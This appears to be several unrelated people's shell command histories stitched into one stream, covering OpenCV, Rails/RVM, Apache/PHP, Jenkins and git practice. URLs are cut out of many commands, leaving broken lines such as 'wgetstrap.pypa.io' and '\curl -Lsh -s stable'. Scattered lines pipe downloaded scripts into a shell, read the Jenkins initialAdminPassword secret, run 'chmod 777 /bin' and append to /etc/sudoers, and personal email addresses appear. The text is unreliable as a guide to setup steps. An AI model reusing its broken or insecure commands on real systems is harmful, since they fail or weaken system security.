libatlas-base-dev gfortran +wgetstrap.pypa.io/get-pip.py +sudo python3 get-pip.py +sudo pip3 install virtualenv virtualenvwrapper +export VIRTUALENVWRAPPER_PYTHON=/usr/bin/python3 +export WORKON_HOME=$HOME/.virtualenvs +source /usr/local/bin/virtualenvwrapper.sh +source ~/.bashrc +mkvirtualenv cv +sudo apt-get install python3.4-dev +sudo apt-get install python3.4-de5 +sudo apt-get install python3.5-dev +pip install numpy +git cloneseez/opencv.git +git checkout 3.0.0 +git checkout 3.1.0 +mkdir build +cmake -D CMAKE_BUILD_TYPE=RELEASE \ -D CMAKE_INSTALL_PREFIX=/usr/local \ -D INSTALL_C_EXAMPLES=OFF \ -D INSTALL_PYTHON_EXAMPLES=ON \ -D OPENCV_EXTRA_MODULES_PATH=~/opencv_contrib/modules \ -D BUILD_EXAMPLES=ON .. +make -j4 +sudo make install +sudo ldconfig +ln /usr/local/lib/python3.5/site-packages/cv2.cpython-35m.so cv2.so +ln /usr/local/lib/python3.5/site-packages/cv2.cpython-34m.so cv2.so +ln /usr/local/lib/python3.4/site-packages/cv2.cpython-34m.so cv2.so +ln /usr/local/lib/python3.5/site-packages/cv2.cpython-35m-x86_64-linux-gnu.so cv2.so +sudo ln /usr/local/lib/python3.5/site-packages/cv2.cpython-35m-x86_64-linux-gnu.so cv2.so +sudo ln -s /usr/local/lib/python3.5/site-packages/cv2.cpython-35m-x86_64-linux-gnu.so cv2.so +workon cv +python +pip install pybrain +python +python --version +python +pip install nltk +python +git clone +sudo pip install +sudo pip install . +python setup.py install +pip install pybrain +sudo pip install . --user +sudo pip install --user +easy_install structure pybrain +python +ls +__init__.py +sudo rm -rf pybrain +git clone +git clone +python setup.py install +sudo pip install . +python +pip install scipy +python +python runtests.py +python runtests.py +python +python --version +ping +ls +ls +ls +pycharm.sh +fsnotifier64 +sh pycharm.sh +gimp +sudo apt install gimp +gimp +sh pycharm.sh +sh pucharm.sh +sh pycharm.sh +sh bin +sh pycharm.sh +ls +bin +ls +sh bin +sh pycharm.sh +ls +sh pucharm.sh +sh pycharm.sh +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +dmesg +ifconfig +ifconfig +ifconfig +ping6 aaaa::244c:f1ff:fe82:28b7 +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ip6 route show +ip6 route +ip 6 +ip +ip -6 route +ping6 fe80::a8bb:ccff:fe00:310 +ping6 aaaa::244c:f1ff:fe82:28b +ping6 aaaa::244c:f1ff:fe82:28b7 +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ifconfig +ping6 2001:dead:200:0:286d:17ff:fe0d:fb13 +top +htop +ls +exit +who +ls +mkdir com341 +ls +mkdir true +ls +atom . +touch true.c +ls +rm true.c +touch true.c +ls +atom true.c +vim true.c +nano true.c +s +ls +gcc -o true true.c +./true +ls -l +echo $? +./true +echo $? +which true +/bin/true +echo $? +echo $? +while /bin/true ; do echo "Hi" ; done +who +ls +ls +mkdir false +false +echo $? +nano false +gcc -o false false.c +ls +nano false +ls +rm false +gcc -o false false.c +ls +./false +echo $? +yes +mkdir yes +ls +ls +nano yes.c +ls +gcc -o yes yes.c +nano yes.c +gcc -o yes yes.c +nano yes.c +gcc -o yes yes.c +nano yes.c +gcc -o yes yes.c +nano yes.c +gcc -o yes yes.c +nano yes.c +gcc -o yes yes.c +./yes +nano yes.c +./yes +gcc -o yes yes.c +./yes +php artisan +php artisan help make:controller +php artisan make:controller NtpcOpenIdController +php artisan tinker +clear +ls +ls d +ls_d +pwd +exit +ls +pwd +ls +ls d +ls njit +ls~d +ls_d +pwd +exit +~/.ssh +.ssh directory +ssh-keygen +$ eval "$(ssh-agent -s)" +~/.ssh/id/_rsa.pub +ssh-add ~/.sshid_rsa +$ ssh-add ~/.ssh/id_rsa +eval "(ssh-agent -s)" +ssh-add~/.ssh/id_rsa +pbcopy < ~/.ssh/id_rsa.pub +ssh-add ~/.ssh/id_rsa +chmod +pwd +git init +ssh-keygen -t rsa -C 'Chris.bonilla23@yahoo.com' +cat git_rsa.pub | pbcopy +cat git_rsa.pub | ThisIsNew +cat git_rsa.pub +ssh-add (git_rsa) +ssh-add git_rsa +njit ssh-add git_rsa +ssh-add +exit +clear +emacs +clear +exit +exit +emacs ~/.bashrc +emacs ~/.bashrc +ls +emacs ~/.bashrc +source ~/.bashrc +clear +exit +emacs .bash_history +ls +ls -al +rm .bashrc +rm .bashrc* +ls +emacs .bashrc +emacs dev.sh +chmod a+x dev.sh +./dev.sh +./dev.sh +emacs ./dev.sh +emacs ./dev.sh +emacs .bashrc +rm .bashrc +./dev.sh +source /home/vagrant/dash/bin/activate +exit +ls +rm dev.sh~ +ls +ls +source ./dev.sh +ls +rm .bashrc~ +ls +git status +exit +ls +source ./dev.sh +ls +pip install -r requirements.txt +ls +emacs dev.sh +exit + /usr/lib/python2.7/importlib/__init__.py +emacs /usr/lib/python2.7/importlib/__init__.py +emacs /usr/lib/python2.7/importlib/__init__.py +emacs Vagrantfile +emacs requirements.txt +./dev.sh +source ./dev.sh +clear +r +r +r +r +r +r +r +r +ls +ls +python manage.py makemigrations +python manage.py migrate +r +r +exit +ls -al +clear +sudo add-apt repository ppa:[chrome ppa] +add-apt +sudo apt-get update +sudo apt-get install google-chrome-stable +sudo apt-get install software-properties-common +sudo add-apt repository ppa:[chrome ppa] +add-apt repository ppa:[chrome ppa] +add-apt-repository ppa:[chrome ppa] +sudo add-apt-repository ppa:[chrome ppa] +sudo apt-get update +sudo apt-get install google-chrome-stable +sudo apt-get install apt-file +sudo apt-file update +apt-file search add-apt-repository +clear +wget -q -O -ssl.google.com/linux/linux_signing_key.pub | sudo apt-key add - +sudo sh -c 'echo "debstable main" >> /etc/apt/sources.list.d/google-chrome.list' +sudo apt-get update +sudo sed -i -e 's/deb http/deb [arch=amd64] http/' "/etc/apt/sources.list.d/google-chrome.list" +sudo apt-get update +sudo apt-get install google-chrome-stable +vim +vi +ll +rm testfile +ll +which vim +whereis vim +vim +sudo apt-get install vim +vim +ll +mv .bashrc .bashrc_old +ll +rm .bashrc_old +ll +mkdir apps +ll +exit +vim ~/.bashrc +exit +top +exit +sudo apt-get install tmux +tmux +exit +sudo apt-get update +sudo apt-get install curl +curl +\curl -Lsh -s stable --rails --autolibs=enable +gpg --keyserver hkp://keys.gnupg.net --recv-keys 409B6B1796C275462A1703113804BB82D39DC0E3 +\curl -Lsh -s stable --rails --autolibs=enable +source /home/gordonzu/.rvm/scripts/rvm +exit +tmux +exit +ll +git +sudo apt-get install git +which ruby +ruby -v +$ source /home/gordonzu/.rvm/scripts/rvm +source /home/gordonzu/.rvm/scripts/rvm +rails -v +ruby -v +which ruby +exit +tmux +exit +ll +ll +ll +vim +exit +tmux +exit +ll +ruby -v +ll +exit +ll +find . -name *.html -print +clr +ruby -v +rvm implode +rm -rf +ll' +ll +ruby -v +ruby +source ~/.bashrc +ruby -v +which ruby +rvm install 2.3.0 --with-openssl-dir=$HOME/.rvm/usr +curl -sSLsh -s stable +rvm requirements +source ~/.rvm/scripts/rvm +rvm install 2.3.0 --with-openssl-dir=$HOME/.rvm/usr +ruby -v +rails -v +rvm use 2.3.0@railstutorial_5_0 --create --default +which gem +ll +ll +l +rr nerdtree +exit +tmux +exit +ll +chmod 775 *.sh +ll +chmod 775 .git-prompt.sh +ll +git clonescrooloose/nerdtree.git ~/.vim/bundle/nerdtree +rr nerdtree +ll +l +git clonescrooloose/nerdtree.git ~/.vim/bundle/nerdtree +l +ll +ll +vim +ll +ll +ll +l +ll +mv nerdtree_plugin old_plugin +ll +clr +gem install rails -v +ll +rails -v +rails new mytest +ll +bundle install +source ~/.bashrc +exit +l +rr nerdtree +exit +git init +ll +rr .gitignore +ll +touch testfile +ll +touch testfile2 +rr testfile2 +git status +cp ../sample_app/.gitignore . +ll +git add -A +git status +git commit -m "first commit" +git config --global user.email "gzulux@gmail.com" +git config --global user.name "gordonzu" +git commit -m "first commit" +repo mytest first_commit +git push heroku master +exit +sudo apt-get install node +clr +sudo add-apt-repository "debssets.heroku.com/branches/stable/apt ./" +curl -Lssets.heroku.com/apt/release.key | sudo apt-key add - +sudo apt-get install heroku +sudo apt-get update +sudo apt-get install heroku +clr +exit +rails s +clr +rails s +exit +tmux +tmux +exit +tmux +ll +git push heroku master +heroku create +git push heroku master +sudo add-apt-repository ppa:noobslab/themes +sudo apt-get update +sudo apt-get install ambience-dark +sudo apt-get install ambiance-dark +su - postgres +sudo su +createuser test_user +sudo su +psql -U dev_test -d postgres -h -W +sudo su - postgres +sudo su +exit +tmux +exit +git status +clr +sudo apt-get install unity-tweak-tool +clr +sudo sh -c 'echo "debstgresql.org/pub/repos/apt/ `lsb_release -cs`-pgdg main" >> /etc/apt/sources.list.d/pgdg.list' +wget -qstgresql.org/media/keys/ACCC4CF8.asc -O - | sudo apt-key add - +sudo apt-get update +sudo apt-get install postgresql postgresql-contrib +sudo su - postgres +l +sudo su +clr +ps aux | grep postgresql +sudo service postgresql stop +ps aux | grep postgresql +sudo service postgresql start +ps aux | grep postgresql +sudo apt-get install gnomishdark +git clone +git status +git add -A +git status +git commit -m "fill in the layout" +git push +git config -- global push.default matching +git config --global push.default matching +git push -u origin master +git co master +git checkout master +git branch +git merge filling-in-layout +git status +git add . +git status +git commit -m "fill in the layout" +git push -u origin master +git push heroku master +clr +bundle update +rails -v +exit +tmux +exit +rvm -v +echo %PATH +echo $PATH +ruby -v +which gem +l +ll +ll +rvm -v +exit +rails -v +ruby -v +source ~/.bashrc +rails -v +rails -v +whereis rails +which rails +rvm -v +tmux +exit +rails -v +echo $PATH +set $PATHS="" +echo $PATHS +set $PATHS="" +export $PATHS +echo $PATH +echo $PATHS +rvm -v +PATHS=false; echo $PATHS +source ~/.bashrc +echo $PATH +PATHS=false; echo $PATHS +source ~/.bashrc +ll +echo $PATH +echo $PATH > pathfile +PATHS=false; echo $PATHS +source ~/.bashrc +echo $PATH +rails -v +exit +echo $PATH +rails -v +rails -v +echo $PATH +ECHO $paths +echo $PATHS +ll +ll | more +sudo vim bash.bashrc +echo $PATH +echo $PATH > pathfile +vim pathfile +exit +tmux +exit +echo $PATH +vim .profile +exit +vim pathfile +exit +echp $PATH +echo $PATH +echo $PATH > pathfile +vim pathfile +exit' +exit +echo $PATH +vim ~/.bashrc +exit +echo $PATH +vim ~/.bashrc +exit +echo $PATH +exit +vim ~/.bashrc +exit +echo $PATH +reboot +sudo reboot +echo $PATH +vim ~/.bashrc +logout +echo $PATH +rvm -v +rails -v +ruby -v +vim ~/.profile +sudo reboot +echo $PATH +RUBY -V +ruby -v +rvm -v +rails -v +echo $PATH > pathfile +vim pathfile +sudo reboot +echo $PATH +echo $PATH > pathfile +vim pathfile +sudo reboot +echo $PATH > pathfile && vim pathfile +sudo reboot +echo $PATH +exit +echo $PATH +vim ~/.bashrc +boot +vim ~/.bash_profile +exit +exit +vim +boot +echo $PATH +vim ~/.bashrc +boot +echo $PATH +rvm -v +vim ~/.bashrc +boot +echo $PATH > pathfile +vim pathfile +boot +vim ~/.tmux.conf +exit +echo $PATH +TMUX +tmux +vim ~/.bashrc +boot +echo $PATH +rvm -v +vim ~/.bashrc +boot +echo $PATH +type rvm | head -1 +ruby -v +which ruby +rvm alias show default +vim ~/.bashrc +boot +echo $PATH +vim ~/.bashrc +boot +echo $PATH +rvm -v +ruby -v +rails -v +sudo find / -name rails -print +clr +bundle update +ll +ll +bundle update +which ruby +clr +rvm implode +ll +ll +rm -rf .bundle +ll +ll +rm -rf .gem +clr +rvm +ruby -v +vim ~/.bashrc +boot +vim ~/.bashrc +boot +echo $PATH +RVM -V +rvm -v +ruby -v +which ruby +rails -v +echo $TERM +vim ~/.bashrc +boot +ll +rr pathfile +echo $TERM +echo $0 +exit +echo $TERM +echo $0 +exit +cp -a ~/.gconf/apps/gnome-terminal ~/terminal-settings.bak +rm -rf ~/.gconf/apps/gnome-terminal +exit +sudo apt-get update +apt-get upgrade +sudo apt-get upgrade +pwd +groups +apt-get install emacs -y +su root +sudo su root +sudo apt-get install emacs -y +echo "export EDITOR=emacs" >> "$HOME/.profile" +ls -la +cat .profile +cat /etc/group +sudo visudoers +sudo emacs /etc/hosts +emacs /etc/sudoers +sudo /etc/sudoers +sudo emacs /etc/sudoers +sudo echo >> /etc/sudoers +sudo su root +exit +ls +ifconfig +sudo apt-get update +sudo apt-get install apache2 +sudo service apache2 start +ls +nano index.html +sudo chmod 777 -R www/ +mkdir Balneario +ls +nano 000-default.conf +service apache2 reload +nano index.html +nano /var/www/Balneario/index.html +mkdir ControlAlbercas +sudo apt-get install mysql-server libapache2-mod-auth-mysql php5-mysql +sudo apt-get install php5 libapache2-mod-php5 php5-mcrypt +sudo service apache2 restart +rm index.html +nano index.php +nano index.php +ls +nano authorized_keys +nano /etc/ssh/sshd_config +sudo service ssh restart +sudo apt-get install phpmyadmin +sudo nano /etc/apache2/apache2.conf +sudo service apache2 restart +sudo ln -s /etc/php5/conf.d/mcrypt.ini /etc/php5/mods-available/mcrypt.ini +sudo php5enmod mcrypt +sudo service apache2 restart +clear +ls +mkdir Frensh +ls +mkdir Controladores +mkdir MySQL +nano connection.php +nano Prueba.php +ls +nano connection.php +nano /etc/php5/apache2/php.ini +service apache2 restart +nano connection.php +nano -c connection.php +exit +ls +ls +celar +clear +LS +ls +nano connection.php +nano -c connection.php +nano -c Data.php +clear +nano -c Data.php +clear +ls +nano -c Control.php +nano -c ../MySQL/connection.php +nano -c Control.php +nano -c Data.php +nano -c setData.php +nano -c setControlValue.php +nano -c getControlValue.php +ls +l +nano Balneario/ +ls +pwd +clear +ls +mkdir Models +mkdir Controllers +ls +nano Prueba.php +rm -R Controladores/ +ls +nano -c Prueba.php +ls +nano -c Data.php +nano -c setData.php +ls +nano Data.php +nano ../Controllers/setData.php +ls +nano -c index.php +clear +nano -c Controllers/setData.php +mkdir js +nano -c buttonHandler.js +nano index.php +nano -c getControlValue.php +nano ../index.php +nano ../js/buttonHandler.js +nano -c setData.php +nano ../js/buttonHandler.js +nano ../index.php +clear +ls +mkdir Helpers +ls +ls +clear +nano -c Login.php +touch ../js/login.js +nano -c Login.php +ping google.com +nano -c Login.php +clear +ls +clear +ls +mkdir Views +nano index.php +nano Login.php +clear +ls +nano Views/Login.php +clear +nano -c Views/Login.php +nano index.php +clear +clear +ls +nano index.php +clear +ls +sudo apt-get install build-essential libssl-dev libcurl4-gnutls-dev libexpat1-dev gettext unzip +ls +nano buttonHandler.js +clear +nano buttonHandler.js +nano ../Models/Control.php +nano ../Models/Data.php +clear +ls +nano index.php +nano Controllers/getData.php +nano Controllers/setData.php +nano Controllers/getData.php +nano Models/Data.php +nano -c Models/Data.php +nano index.php +nano Controllers/setData.php +nano Controllers/getRegimen.php +nano -c Models/Regimen.php +nano Controllers/getRegimen.php +nano -c Models/Regimen.php +clear +nano -c buttonHandler.js +cler +clear +clear +nano -c buttonHandler.js +nano index.php +clear +nano -c index.php +clear +nano -c js/buttonHandler.js +clear +nano index.php +ls +nano getRegimen.php +nano setRegimen.php +nano getRegimen.php +nano setRegimen.php +ls +nano R +nano Regimen.php +ls +nano setRegimen.php +nano ../Models/Regimen.php +nano setRegimen.php +nano ../Models/Regimen.php +nano setRegimen.php +nano -c id +nano -c index.php +nano ../Models/Regimen.php +nano Models/Regimen.php +nano Controllers/setRegimen.php +clear +ls +pwd +nano -c index.php +nano -c js/buttonHandler.js +ls +upzip jchartfx.7.2.5274.zip -d /var/www/Balneario/Frensh/ +unzip jchartfx.7.2.5274.zip -d /var/www/Balneario/Frensh/ +ls +nano index.php +nano index.php.save +rm index.php.save +rm maps.txt +rm licenseAgreement-jChartFXplus.pdf +rm LicenseAgreement-jChartFX.pdf +rm libraries.txt +rm -R motifs/ +ls +rm documentation.txt +ls +ls +ls +cat samples.txt +clear +ls +rm samples.txt +rm releasenotes.txt +clear +ls +clear +ls +ls +ls +ls +ls +clear +ls +cat readme.txt +ls Palettes/ +ls Attributes/ +clear +ls +unzip jchartfx.7.2.5274.zip +ls +ls +l +ls +cp -R motifs/ /var/www/Balneario/Frensh/ +ls +ls +ls +ls +ls +ls +clear +nano buttonHandler.js +clear +apt-get install git +ls +nano js/buttonHandler.js +nano index.php +clear +ls +nano authorized_keys +clear +ls +nano js/buttonHandler.js +ls motifs/ +ls styles/Attributes/ +ls styles/Palettes/ +clear +ls +nano id +clear +nano index.php +clear +ls +s +celar +clear +ls +nano index.php +nano js//buttonHandler.js +clear +ls +clear +sudo add-apt-repository ppa:cassou/emacs +sudo apt-get update +sudo apt-get install emacs24 +ls +emacs samples.txt +ls +emacs jchartfx.density.js +cat jchartfx.density.js +clear +sudo apt-get install node +clear +ls +emacs index.php +clear +ls +rm \#index.php# +ls +nano index.php +nano js/buttonHandler.js +nano Controllers/setControlValue.php +nano js/buttonHandler.js +clear +git config --global user.name "laspalmas" +git config --global user.email "blp.rgp@gmail.com" +git config --list +clear +git init +git add . +gti commit -m "Primer commit" +git commit -m "Primer commit" +clear +git remote add originspalmas/Frensh.git +git push -u origin master +touch README.md +git push -u origin master +git remote add originspalmas/Frensh.git +git push -u origin master +ls +ls -a +ls +ls -a +nano config +nano description +nano HEAD +ls +git add README.md +git commit -m "Second attempt" +git remote add originsplamas/Frensh.git +nano .git/config +git remote add originsplamas/Frensh.git +git remote add origin +git remote add originsplamas/Frensh.git +git push -u origin master +exit +ls +clear +me la pelas +echo "Me la pelas" +touch mlp +echo "me la pelas " >> mlp +cat mlp +rm mlp +celar +aclear +clear +sudo update +sudo apt-get update +sudo apt-get install nodejs +clear +ls +ls +nano setRegimen.php +nano setRegister.php +nano Prueba.php +nano setRegister.php +ls +touch Register.php +cat Data.php >> Register.php +nano Register.php +clear +ls +ls +ls +nano -c Register.php +emacs -c Register.php +ls +emacs Register.php +clear +ls +emacs Models/Control.php +emacs js/buttonHandler.js +emacs index.php +emacs index.php js/buttonHandler.js +emacs index.php +clear +exit +express first-app +nc +ls + ls -a +ls -a +node init +npm i +ls -a +chdir babel-starter-kit-express-test +ls -a +npm i +npm run dev +npm run dev +sudo yum install tomcat-webapps tomcat-admin-webapps +sudo service tomcat start +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +vi big.sh +./big.sh +chmod 777 big.sh +./big.sh +./big.sh 7 8 9 +vi big.sh +./big.sh +./big.sh 7 8 +./big.sh 789 55 +cp big.sh big +cat big +cp big/bin +cp big /bin +cp big /bin +chmod 777 big +cp big /bin +whereis big +exit +whereis jenkins +clear +sudo yum install git +sudo yum install wget +sudo yum install jenkins +sudo yum install java +sudo yum install jenkins +sudo yum install jenkin +sudo yum install jenkins +sudo yum install tomcat +sudo yum install crontab +sudo yum install gcc +sudo yum install g++ +sudo wget -O /etc/yum.repos.d/jenkins.repos.io/redhat-stable/jenkins.repo +sudo rpm --imports.io/redhat-stable/jenkins.io.key +sudo yum install jenkins +sudo yum install cronie +crontab -e +whereis jenkins +whereis tomcat +ls +ls -ltr +ls +ls +ls +ls +ls +sudo vi /etc/sysconfig/jenkins +sudo service jenkins start +sudo cat /var/lib/jenkins/secrets/initialAdminPassword +sudo yum install tomcat +whereis tomcat +sudo service tomcat start +s +ls +big +big 7 8 +./big.sh 7 1 +sudo service jenkins start +whereis jenkins +whereis tomcat +whereis git +sudo service jenkins start +sudo service tomcat start +ls +ll +chmod -R 777 shell_scripts/ +ll +BIG 5 4 +vi file_ext.sh +sh file_ext.sh big.2sh +sh file_ext.sh +mkdir 11 12 +rm 11 +mkdir 11 12 +sh file_ext.sh +ln -s big2.sh big_link +ll +ll -ltr +clear +vi file1_ext.sh +sh file1_ext.sh +./file1_ext.sh +sh file1_ext.sh +vi file1_ext.sh +ll +vi file1_ext.sh +cat file1_ext.sh +cat q +sh q.sh +cleaae +clear +cat q +ll +chmod 777 q +sh q.sh +vi exist.sh +sh exist.sh +clear +vi demo.sh +sh demo.sh +sh demo.sh 5 +vi demo.sh +sh demo.sh 5 +vi demo.sh +sh demo.sh 5 +vi bubble_sort.sh +sh bubble_sort.sh +vi bubble_sort.sh +sh bubble_sort.sh +vi bubble_sort.sh +sh bubble_sort.sh +vi bubble_sort.sh +set -x +set-x +set -x bubble_sort.sh +bash -x ./bubble_sort.sh +sh -x ./big2.sh +vi fact.sh +sh fact.sh +sh fact.sh 5 +vi fact.sh +sh fact.sh 5 +clear +ll +cat demo.sh +cat fact.sh +vim fact.sh +vi fact.sh +sh fact.sh 4 +vi fact.sh +sh fact.sh 4 +vi fact.sh +sh fact.sh 4 +exit +ls +mkdir shell_scripts +ls +ls +vi example1.sh +./example1.sh +ll +chmod -R 777 shell_scripts +chmod -R 777 shell_scripts +./example1.sh +vi example2.sh +sh example2.sh +vi example3.sh +./example3.sh anil blore +ll +sh example3.sh anil blore +vi five.sh +sh five.sh 8 +vi five.sh +sh five.sh 8 +sh five.sh 5 +sh five.sh 1 +vi big2.sh +sh big2.sh 5 8 +sh big2.sh 8 5 +sh big2.sh 1112154651555551 -45845 +sh big2.sh 0 -1 +sh big2.sh 0 0 +sh big2.sh 0 1 +which ls +cp big2.sh BIG +cat BIG +cp BIG /bin +cp BIG /usr/bin +chmod 777 /bin +chmod 777 BIG +cp BIG /bin +clear +vi example4.sh +sh example4.sh 4 +vi example4.sh +sh example4.sh 4 +vi example4.sh +sh example4.sh 4 5 +sh example4.sh 466 7 5 +vi example4.sh +sh example4.sh 466 7 5 +sh example4.sh 466 7 +sh example4.sh 466 +sh example4.sh 466 7 5 +sh example4.sh 466 2 +vi big3.sh +sh big3.sh 7 8 9 +sh big3.sh +sh big3.sh 7 5 8 +vi big3.sh +./big3.sh +sh big3.sh 4 5 3 +vi big3.sh +sh big3.sh 4 5 3 +sh big3.sh 1 233 4 +ll +sh fact.sh +vi fact.sh +sh fact.sh 5 +vi fact1.sh +sh fact1.sh +vi fact1.sh +sh fact1.sh +vi fact1.sh +sh fact1.sh +vi fact1.sh +clear +vi adding2.sh +sh adding2.sh +sh adding2.sh 5 8 +sh adding2.sh 12656515616515614515641231654841216813498423168 589412315665325498154987415746536876513231658 +sh adding2.sh 11111111111111111111111111111111111111111111111 111111111111111111111111111111111111111111111 +vi sub.sh +sh sub.sh 5 9 +sh sub.sh 10 5 +sh sub.sh 10 10 +sh sub.sh 10 1 +vi add_num.sh +sh add_num.sh 10 +vi add_num.sh +sh add_num.sh 10 +sh add_num.sh 5 +sh add_num.sh 5 5 +vi add_num.sh +sh add_num.sh 5 +vi add_num.sh +sh add_num.sh 5 +vi add_num.sh +sh add_num.sh 5 +vi add_num.sh +vi read_file.sh +sh read_file.sh +ls +vi read_file.sh +sh read_file.sh +vi count.sh +sh count.sh +vi count.sh +sh count.sh +vi count.sh +sh count.sh +vi count.sh +sh count.sh +vi count.sh +sh count.sh +vi demo.sh +vi count.sh +sh count.sh +vi count.sh +sh count.sh +cat sub.sh +tac sub.sh +vi reverse.sh +sh reverse.sh sub.sh +vi r.sh +vi reverse.sh +sh reverse.sh r.sh +vi r +sh reverse.sh r +vi reverse.sh +sh reverse.sh r +vi r.sh +sudo service jenkins start +sudo service jenkins start +sudo service jenkins starst +sudo service jenkins start +sudo service jenkins start +sudo service jenkins start +ll +sudo service jenkins start +git tag +git tag v1.0 +git tag +git show v1.0 +vi demo +git add demo +git commit -m "demo added" +git tag +git tag v1.0 +git tag v1.1 +git show v1.1 +git tag -d v1.1 +git tag +cat demo +vi demo +vi demo1 +git add * +git commit -m "added D1 |D2" +git status +git log +git tag v1.1 +git tag +git show v1.1 +git push origin v1.1 +git tag -d +git tag +git tag -d v1.0 +git tag -d tags +git tag -d v1.0 +git tag -d v1.1 +git tag +git push origin --delete v1.0 +git push origin --delete v1.1 +exit +ls +cleaer +clear +sudo yum install git +whereis git +git init +ls +c d.. +pwd +pwd +ls +ll +mkdir git_repo +git init +ll +vi test1.txt +git status +git add test1.txt +git status +git config --global usee.email "anilnagaraj23@gmail.com" +git config --global user.name "anilnagaraj23" +git commit -m "added" +git status +git log +vi index.hmtl +vi test1.txt +git status +git add. +git add * +git status +git commit -m "modified and added" +git status +clear +git remote add origin +git push -u origin master +git config colou.ui +git config colou.ui true +git log +ll +ls +ls -a +git config color.ui +ll +ls +ll +git config --global color.ui true +git log +git status +git branch MyNewBranch +git branch +git log +git checkout MyNewBranch +vi test2.txt +git add +git add test2.txt +git status +git commit -m "added Test@for new branch" +git push -u origin MyNewBranch +git checkout master +git branch +git merge MyNewBranch +git statsus +git status +git push -u origin master +git branch -d MyNewBranch +git push origin --delete MyNewBranch +ls +ls +vi test1.txt +git add * +git status +git commit -m "added for email verify" +git status + git config --global user.name "Your Name" + git config --global user.name "anilnagaraj23" +git config --global user.email you@example.com +git config --global user.email anilnagaraj23@gmail.com +git commit -m "added for email verify" +git status +git push -origin master +git push -u origin master +ll +mkdir git +ls +mkdir git_repo +git init +vi test1 +git status +git add test1 +git status +git commit -m "added for commit" +git status +git log +vi test1 +git add test1 +git status +git commit -m "added 2nd line" +git status +git log +git checkout bf6d45d +git checkout master +ls +ls -a +ll -a +ls +cat config +touch test2 test3 +vi test2 +vi test3 +git status +git tag v1.0 +git show v1.0 +git add * +git status +git tag v1. +git tag +git tag -d v1.0 +git commit -m "added | modifeid" +git tag v1.0 +git show v1.0 +git tag +git checkout v1.0 +git show v1.0 +git status +git branch +git checkout master +vi test1 +git status +git add * +git commit -m "add this for branching" +git tag v1.1 +git show v1.1 +git branch +git branch mynewbranch +git checkout mynewbranch +git brnch +git branch +ls +vi test4 +git add * +git commit -m "demo file" +git checkout master +ls +git checkout mynewbranch +git merge master +git checkout master +ls +git branch +git merge mynewbranch +ls +vi test2 +git chekout munewbranch +git checkout munewbranch +git checkout mynewbranch +vi test2 +git add * +git commit -m "merging" +git checkout master +git add * +git commit -m "merging conflict" +ls +git merge mynewbranch +ls +vi test2 +git add * +git checkout mynewbranch +vi test2 +git add * +git commit -m "||||||" +git checkout master +git commit -m "''''" +ls +git checkout -b newbranch +git tga +git tag +git checkout -b newbranch2 v1.1 +git tag +git branch +git checkout master +ls +git +ls +git checkout newbranch +git merge master +git branch +ls +git checkout newbranch2 +s +ls +git merge master +ls +git checkout master +vi test1 +vi test2 +git add * +git status +git commit -m "added " +git log +git rebase mynewbranch +ls +ls +git status +git merge master +git add * +git status +git commit -m "ad" +git status +git og +git log +git branch +git rebase --continue +git add * +git rebase --continue +git branch +git branch master +git checkout master +git rebase --continue +git branch +whereis tomcat +ls + +whereis tomcat + +c +d +ls +ls +whereis tomcat +ls +ls +ll +pwd +ll +git remote add origin +git push -u origin master +ll +ll +cat main.c +ll +ll +sudo service jenkins start +ls +pwd +git hooks +exit +git remote add origin +git push -u origin master +git branch +ls +ls +git push -u origin master +git branch +git push -u origin mynewbranch +git remote add origin +git push -u origin mynewbranch +pwd +git checkout master +ls +vi big.c +vi fact.c +git status +git add * +git status +git commit -m "c files" +git status +git rebase --continue +git log +git branch +git checkout mynewbranch +ls +vi reverse.c +git tag R1 +vi polidrome.c +git tag R2 +git tag +git show R1 +git add * +git commit -m "relese" +git tag R1 +git show R1 +git show R2 +git merge master +git checkout master +ls +vi test2 +git add * +git add test2 +git commit -m "resolved" +git checkout master +git merge master +git checkout mynewbranch +git merge master +ls +git checkout master +ls +git branch +git checkout mynewbranch +git push master +ls +git branch +git status +git rebase master +git rebase -- continue +git rebase --continue +git rebase --abort +ls +git branch +git checkout mynewbranch +git push -u origin mynewbranch +git merge master +git checkout master +ls +git merge mynewbranch +ls +git branch +git tag R2.1 +git show R2.1 +git branch +ls +vi test1 +git add test1 +git commit -m "adding123 " +git log +vi test1 +git add test1 +git commit -m "adding1234" +git og +git log +git revert HEAD +git log test1 +git log +git revert a13b56ae5f91f19f3bf1f472a68ecc8cccea90ef +clear +git reset --mixed HEAD +M +git log +git reset --soft 92836285b369808b322e684942b86a3f6316dad8 +git log +git branch +vi tses1 +git stash +git checkout mynewbranch +git stash pop +git checkout master +git merge master +cat test1 +git add * +git commit -m "kk" +git merge master +git merge mynewbranch +git checkout master +git add * +git commit -m "kk" +git checkout master +git merge mynewbranch +git merge mynewbranchgit branch +git branch +git stash pop +vi test1 +git add * +git commit -m "lkjh" +git stash pop +vi test1 +git add * +git stash +git checkout mynewbranch +git push -u origin master +git push -u origin mynewbranch +git branch +git checkout master +git stash pop +vi test1 +git commit -m "gghggawq" +git add * +git status +git commit -m "gghggawq" +git cherrypick HEAD +git cherry-pick HEAD +ll +mkdir central_repo +mkdir work1 work2 +git init --bare +ll +git clone /home/ec2-user/git/central_repo/ +ll +vi sample +git add sample +git commit -m "range" +git push /home/ec2-user/git/central_repo/ +git push +clear +git push /home/ec2-user/git/central_repo/ +git config --global push.default simple +ll +ll +vi sample2 +git add * +git clone /home/ec2-user/git/central_repo/ +ll +vi samplyr +git add * +git commit -m "message" +git push /home/ec2-user/git/central_repo/ +ls +ls +ll -a +ls +ll +rm -r 11 12 +ll +sudo yum install gcc +sudo yum install java +sudo yum install javac +sudo yum install ant +sudo yum install maven +clear +ll +ll +ll -a +sudo cd .git +sudo cat .git +vi make +ll +vi main.c +ll +vi big.c +vi fact.c +whereis tomcat +whereis jenkins +ll +pwd +ll +ll +clear +whereis tomcat +ll +ll +ll +ll +whereis jenkins +ll +pwd +pwd +pwd +cp /usr/lib/jenkins/jenkins.war /var/lib/tomcat/webapps +sudo cp 